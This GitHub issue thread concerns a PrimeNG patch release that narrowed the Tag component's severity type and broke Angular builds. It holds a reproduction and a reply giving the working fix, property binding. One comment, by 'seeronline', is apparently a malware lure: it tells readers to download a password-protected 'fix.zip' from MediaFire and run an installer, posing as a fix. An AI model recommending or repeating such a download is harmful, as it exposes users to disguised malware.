### ISSUE TITLE
Tag: Release 17.16.1 introduces breaking changes

### ISSUE THREAD

**Issue by thetric** [primefaces/primeng#16286]
### Describe the bug

Commit https://github.com/primefaces/primeng/commit/cd820cf716d691882439f89090dd0daf3e94c941#diff-4e486f08632096b907b91e4fd193012b6fb52cfe9e3da1a62308de912c4e3277R50 introduces breaking changes in patch release 17.16.1.
This change is really annoying because it causes our builds to fail due to

> ERROR] NG2: Type 'string' is not assignable to type '"success" | "danger" | "warning" | "info" | "secondary" | "contrast"'. [plugin angular-compiler]

The Angular compiler does not seem smart enough to detect the correct type in templates with dynamic severity levels, e.g.

```ts
import { Component } from '@angular/core';
import { bootstrapApplication } from '@angular/platform-browser';

import { TagModule } from 'primeng/tag';

@Component({
  selector: 'app-root',
  standalone: true,
  imports: [TagModule],
  template: `
    <h1>Hello from {{ name }}!</h1>
    <a target="_blank" href="https://angular.dev/overview">
      Learn more about Angular
    </a>
    <p-tag severity="{{ getSeverity() }}"/>
  `,
})
export class App {
  name = 'Angular';

  getSeverity(): "success" | "secondary" | "info" | "warning" | "danger" | "contrast" | undefined {
    return 'info';
  }
}

bootstrapApplication(App);

```

### Environment

see below

### Angular version

18.2.1

### PrimeNG version

17.18.9

### Build / Runtime

Angular CLI App

### Language

TypeScript

### Node version (for AoT issues node --version)

20.16.0

### Steps to reproduce the behavior

https://stackblitz.com/edit/stackblitz-starters-unx2od?file=src%2Fmain.ts

### Expected behavior

It compiles again

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KyrumX** [comment]
Try `<p-tag [severity]="getSeverity()"/>` instead, that should look at the return type directly.

**Comment by thetric** [comment]
Thanks, I seem to have overlooked this :D
